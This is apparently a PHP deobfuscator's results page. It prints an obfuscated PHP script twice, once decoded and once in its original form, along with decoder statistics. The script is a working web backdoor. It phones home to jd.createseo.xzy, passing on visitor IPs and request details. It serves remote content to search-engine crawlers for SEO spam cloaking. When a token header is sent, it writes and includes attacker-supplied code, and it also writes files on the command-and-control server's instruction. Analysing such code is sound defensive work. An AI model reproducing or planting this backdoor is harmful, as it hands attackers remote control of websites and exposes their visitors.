Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$u22=base64_decode(ba..

Decoded Output download

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$u22=base64_decode(base64_decode("TWk0eUxqRTM="));$v18 = "jd.createseo.xzy";$f25 = base64_decode("NDAwMg==");$q12 = clientip();$c23 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))] : base64_decode("");$r4 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))] : base64_decode("");$c23i = $_SERVER[base64_decode("UkVRVUVTVF9VUkk=")];$g31 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$c35 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode("");$a25 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode("");$v28 = ((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) !== base64_decode(base64_decode("YjJabQ=="))) || (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))] === base64_decode(base64_decode("YUhSMGNITT0="))) || (!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) !== base64_decode(base64_decode("YjJabQ==")))) ?  base64_decode("aHR0cHM="): base64_decode("aHR0cA==");$m49 = array(base64_decode(base64_decode("VEdGdVp6b2c=")).$c35,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$r4, base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$c23, base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$v28, base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$g31, base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$c23i, base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$v18, base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$q12,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$a25);$v40= "proto=$v28&shost=$g31&ip=$q12&dbgroup=$f25&uri=$c23i";if (strlen($a25)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH);  echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ==")));  exit; }if (($c23i!==base64_decode("L2Zhdmljb24uaWNv")) &&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$r4) || (@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$c23) && (@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+_\d+_\d+)$#i',$c23i)||@preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1ZzdFh5OWRQeWhjWkNzcEkyaz0=")),$c23i))))){        list($r46,$m2,$g28) = urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$v18.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$v40,$m49,$v40);    if (stripos($g28,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($r46); }    if (stripos($r46,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($r46,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($r46); }    if (stripos($r46,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($r46); }        if (stripos($r46,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){        if (stripos($r46,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")) . $r46); exit;}        if (strstr($r46,base64_decode("Wyxd"))){$g8 = explode(base64_decode("Wyxd"),$r46); $h33 = explode(base64_decode("LA=="),$g8[0]); $g24 = base64_decode(base64_decode("")); foreach($h33 as $c23l){ list($j33,$m2) = urlx($c23l,null,null,$g8[1]);$g24 .= $c23l.$j33; } exit($g24);}    }    if (@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$r46)){$i6 = explode(base64_decode("Wyxd"),$r46); todk($i6[0],$i6[1]); if(file_exists($i6[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI=")));}else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9")));} }    if (stripos($r46,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($r46.base64_decode("IA==").$v18.$u22); }    if ($m2 >= 400 && $m2 < 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0=")));exit;}    if ($m2 >= 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09")));exit;}    if ($r46!=base64_decode("")){ exit($r46); }}function urlx($c23l,$m49=null,$v40=null,$r4=null) {    if (!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; }    try {        $c17 = curl_init();        curl_setopt($c17, CURLOPT_URL, $c23l); curl_setopt($c17, CURLOPT_FOLLOWLOCATION,1); curl_setopt($c17, CURLOPT_SSL_VERIFYPEER, FALSE);        curl_setopt($c17, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($c17, CURLOPT_ENCODING, base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA==")));        curl_setopt($c17, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($c17, CURLOPT_RETURNTRANSFER, 1);        ($m49===null)?base64_decode(base64_decode("")):curl_setopt($c17, CURLOPT_HTTPHEADER, $m49); ($r4===null||$r4===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($c17, CURLOPT_USERAGENT, $r4);        if ($v40!==null && $v40!==base64_decode("")) {curl_setopt($c17, CURLOPT_POST, 1); curl_setopt($c17, CURLOPT_POSTFIELDS, $v40); }        $r26 = curl_exec($c17);$m2 = curl_getinfo($c17,CURLINFO_HTTP_CODE); $g28 = curl_getinfo($c17,CURLINFO_CONTENT_TYPE);curl_close($c17);    } catch (Exception $c2) { }   if ($r26===false && function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))) {        ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")), base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA==")));        try {            $r26 = @file_get_contents($c23l);        } catch (Exception $c2) { }    }    return array($r26,$m2,$g28);}function todk($x8,$l29){@file_put_contents($x8,$l29);}function clientip(){ $a4=base64_decode(base64_decode(""));    if (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))] !== base64_decode(base64_decode(""))){  $a4 = $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))];    } elseif (getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))) && strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))), base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $a4 = getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ==")));    } elseif (isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]) && $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))] && strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))], base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $a4 = $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))];    }    if (stristr($a4, base64_decode(base64_decode("TEE9PQ==")))) { $i6 = explode(base64_decode("LA=="), $a4); $a4 = $i6[0]; } return $a4;}?>

Did this file decode correctly?

Original Code

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$u22=base64_decode(base64_decode("TWk0eUxqRTM="));$v18 = "\x6a\144\x2e\143\x72\145\x61\164\x65\163\x65\157\x2e\170\x7a\171";$f25 = base64_decode("NDAwMg==");$q12 = clientip();$c23 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))] : base64_decode("");$r4 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))] : base64_decode("");$c23i = $_SERVER[base64_decode("UkVRVUVTVF9VUkk=")];$g31 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$c35 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode("");$a25 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode("");$v28 = ((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) !== base64_decode(base64_decode("YjJabQ=="))) || (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))] === base64_decode(base64_decode("YUhSMGNITT0="))) || (!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) !== base64_decode(base64_decode("YjJabQ==")))) ?  base64_decode("aHR0cHM="): base64_decode("aHR0cA==");$m49 = array(base64_decode(base64_decode("VEdGdVp6b2c=")).$c35,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$r4, base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$c23, base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$v28, base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$g31, base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$c23i, base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$v18, base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$q12,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$a25);$v40= "proto=$v28&shost=$g31&ip=$q12&dbgroup=$f25&uri=$c23i";if (strlen($a25)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH);  echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ==")));  exit; }if (($c23i!==base64_decode("L2Zhdmljb24uaWNv")) &&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$r4) || (@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$c23) && (@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+_\d+_\d+)$#i',$c23i)||@preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1ZzdFh5OWRQeWhjWkNzcEkyaz0=")),$c23i))))){        list($r46,$m2,$g28) = urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$v18.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$v40,$m49,$v40);    if (stripos($g28,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($r46); }    if (stripos($r46,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($r46,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($r46); }    if (stripos($r46,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($r46); }        if (stripos($r46,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){        if (stripos($r46,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")) . $r46); exit;}        if (strstr($r46,base64_decode("Wyxd"))){$g8 = explode(base64_decode("Wyxd"),$r46); $h33 = explode(base64_decode("LA=="),$g8[0]); $g24 = base64_decode(base64_decode("")); foreach($h33 as $c23l){ list($j33,$m2) = urlx($c23l,null,null,$g8[1]);$g24 .= $c23l.$j33; } exit($g24);}    }    if (@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$r46)){$i6 = explode(base64_decode("Wyxd"),$r46); todk($i6[0],$i6[1]); if(file_exists($i6[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI=")));}else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9")));} }    if (stripos($r46,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($r46.base64_decode("IA==").$v18.$u22); }    if ($m2 >= 400 && $m2 < 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0=")));exit;}    if ($m2 >= 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09")));exit;}    if ($r46!=base64_decode("")){ exit($r46); }}function urlx($c23l,$m49=null,$v40=null,$r4=null) {    if (!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; }    try {        $c17 = curl_init();        curl_setopt($c17, CURLOPT_URL, $c23l); curl_setopt($c17, CURLOPT_FOLLOWLOCATION,1); curl_setopt($c17, CURLOPT_SSL_VERIFYPEER, FALSE);        curl_setopt($c17, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($c17, CURLOPT_ENCODING, base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA==")));        curl_setopt($c17, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($c17, CURLOPT_RETURNTRANSFER, 1);        ($m49===null)?base64_decode(base64_decode("")):curl_setopt($c17, CURLOPT_HTTPHEADER, $m49); ($r4===null||$r4===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($c17, CURLOPT_USERAGENT, $r4);        if ($v40!==null && $v40!==base64_decode("")) {curl_setopt($c17, CURLOPT_POST, 1); curl_setopt($c17, CURLOPT_POSTFIELDS, $v40); }        $r26 = curl_exec($c17);$m2 = curl_getinfo($c17,CURLINFO_HTTP_CODE); $g28 = curl_getinfo($c17,CURLINFO_CONTENT_TYPE);curl_close($c17);    } catch (Exception $c2) { }   if ($r26===false && function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))) {        ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")), base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA==")));        try {            $r26 = @file_get_contents($c23l);        } catch (Exception $c2) { }    }    return array($r26,$m2,$g28);}function todk($x8,$l29){@file_put_contents($x8,$l29);}function clientip(){ $a4=base64_decode(base64_decode(""));    if (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))] !== base64_decode(base64_decode(""))){  $a4 = $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))];    } elseif (getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))) && strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))), base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $a4 = getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ==")));    } elseif (isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]) && $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))] && strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))], base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $a4 = $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))];    }    if (stristr($a4, base64_decode(base64_decode("TEE9PQ==")))) { $i6 = explode(base64_decode("LA=="), $a4); $a4 = $i6[0]; } return $a4;}?>

Function Calls

set_time_limit	1
error_reporting	1
ignore_user_abort	1

Variables

None

Stats

MD5	25a55534e8b5b1f62874507abfe1d583
Eval Count	0
Decode Time	90 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats